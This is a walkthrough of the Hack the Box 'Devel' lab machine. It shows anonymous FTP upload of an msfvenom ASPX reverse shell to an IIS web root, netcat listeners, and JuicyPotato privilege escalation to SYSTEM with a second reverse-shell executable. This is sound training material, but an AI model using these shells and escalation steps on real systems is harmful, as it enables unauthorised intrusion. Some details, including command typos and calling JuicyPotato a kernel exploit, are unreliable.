Hack the Box - Devel - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Devel machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Devel machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.98.96.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.98.96

Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -T4 -p21,80 10.129.98.96

Since we see that FTP is available, we now run some enumeration scripts with Nmap:

nmap --scripts=ftp* -p21 10.129.98.96

The scan tells us that we can login to FTP anonymously, so let's do a manual enumeration of the service:

ftp 10.129.98.96
anonymous
ls

Judging from the iisstart.htm file, it looks like the FTP service points us directly at the target's web root directory. We'll make a test file and see if we can access it from our web browser:

echo “test for devel” > test.txt

Back in the FTP service, we try to upload the test.txt file:

put test.txt
dir

The file is on the FTP server. Let's check that we can access it with our web browser:

http://10.129.98.96/test.txt

Finding a Way In

That confirms that we have arbitrary file upload on the webserver. Now we want to
create a web file with a reverse shell payload back to our attacking system. Since the web server is running IIS, we'll create a ASPX file with MSFvenom:

mdfvenom -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=443 -f aspx -o HTBwinRevShell443.aspx

Now to upload it to the webserver via FTP:

put HTBwinRevShell443.aspx
dir

Before we execute our reverse shell by web browser, we need to start our Netcat listener on our attacking machine.

sudo nc -nlvp 443

Now to activate the reverse shell via web browser:

http://10.129.98.96/HTBwinRevShell443.aspx
whoami

Foothold Enumeration

We're logged in as a service account. Let's check our user's privileges:

whoami /priv

Our current user has the SeImpersonatePrivilege, which means we could potentially perform a Potato attack to escalate our privileges. Specifially, we'll be attacking the system with JuicyPotato. Before we proceed, let's take a look at the target's system information.

sysinfo

Privilege Escalation

To perform a JuicyPotato attack, we need to know our OSs version and architecture. Most modern OSs are 64-bit, and almost all of the Potato exploits use 64-bit executables, but our target's architecture is 32-bit. Fortunately, somebody created a 32-bit version of JuicyPotato just for cases like this, and it can be found at the following URL:

https://github.com/ivanitlearning/Juicy-Potato-x86

More specifically, the executable we want to use on the target is located here:

https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

wget https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

We'll also need to create an executable to pair with JuicyPotato that'll open privileged reverse shell on our attacking system. Note that we also have to make sure that the executable we create is 32-bit. We'll do that with MSFvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=80 -f exe -o HTBrevshellX86p80.exe -a x86 --platform windows

Next, we'll upload the two executable files to the target using FTP, remembering to switch to binary mode so the files aren't corrupted during the transfer:

binary
put Juicy.Potato.x86.exe
put HTBrevshellX86p80.exe
dir

Before performing the attack, we need to setup another Netcat listener on port 80:

sudo nc -nlvp 80

Then navigate to the web root directory, which for this system is the following:

cd c:\inetpub\wwwroot\

Sometimes when we use JuicyPotato, we can simply run the attack using “standard” arguments like so:

Juicy.Potato.x86.exe -t * -l 6666 -p c:\inetpub\wwwroot\HTBrevshellX86p80.exe

However, this will not work, so we'll need to supply the exploit with a valid CLSID number to work properly. The github repo for the regular 64-bit version of the exploit houses a list of CLSIDs here:

https://github.com/ohpe/juicy-potato/tree/master/CLSID

More specifically, our target is running Windows 7, so we need to look here:

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_7_Enterprise

This entry operates as NT AUTHORITY\SYSTEM, so we'll use that.

Juicy.Potato.x86.exe -t * -l 6666 -p c:\inetpub\wwwroot\HTBrevshellX86p80.exe -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
whoami

Capturing the User Flag

User flags for Hack the Box Windows systems are usually located in a non-Administrator user's Desktop directory:

type c:\users\babis\desktop\user.txt.txt

Capturing the Root Flag

Root flags for Hack the Box Windows system are usually in the Administrator user's Desktop directory:

type c:\users\administrator\desktop\root.txt

Summary

After initial scans, we found that the target's FTP service was configured to accept anonymous login and file upload. This, combined with the fact that the target's web directories were also accessible via FTP meant that a foothold could be established by uploading a malicious web file via FTP, then activating the malicious file's code in web browser. Once inside, we found that the service account we had access to had certain privileges which allowed us to leverage a kernel exploit against the target to gain elevated access and capture our objective flag files.

Finish